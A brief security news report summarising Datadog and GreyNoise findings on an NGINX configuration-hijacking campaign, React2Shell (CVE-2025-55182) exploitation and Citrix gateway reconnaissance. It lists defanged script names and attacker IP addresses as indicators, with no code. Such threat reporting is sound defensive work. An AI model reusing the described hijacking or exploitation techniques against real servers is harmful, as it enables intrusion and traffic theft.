ACCORDING to Datadog Security Labs, cyber security researchers have disclosed an active web traffic hijacking campaign targeting NGINX installations and management panels such as Baota, using malicious NGINX configurations to route traffic through attacker-controlled backend servers. The campaign leverages a multi-stage toolkit, including scripts like zx[.]sh, bt[.]sh, 4zdh[.]sh, zdh[.]sh and ok[.]sh, to persist and inject malicious configurations that redirect web requests via the proxy_pass directive.
GreyNoise noted that two IP addresses—193.142.147[.]209 and 87.121.84[.]24—account for 56% of observed exploitation attempts two months after React2Shell’s public disclosure, with a total of 1,083 unique source IP addresses involved between 26 January and 2 February 2026. The activity is linked to the React2Shell vulnerability (CVE-2025-55182, CVSS 10.0), and the campaign targets Asian TLDs such as .in and .id, as well as .pe, .bd, .th, and Chinese hosting infrastructure.
The dominant sources deploy distinct post-exploitation payloads, including cryptomining binaries and reverse shells, according to GreyNoise. The report also describes a coordinated reconnaissance effort against Citrix ADC Gateway and Netscaler Gateway infrastructure using tens of thousands of residential proxies alongside a Microsoft Azure IP address to discover login panels, with GreyNoise noting a two-mode operation: large-scale login panel discovery and a concentrated AWS-hosted disclosure sprint.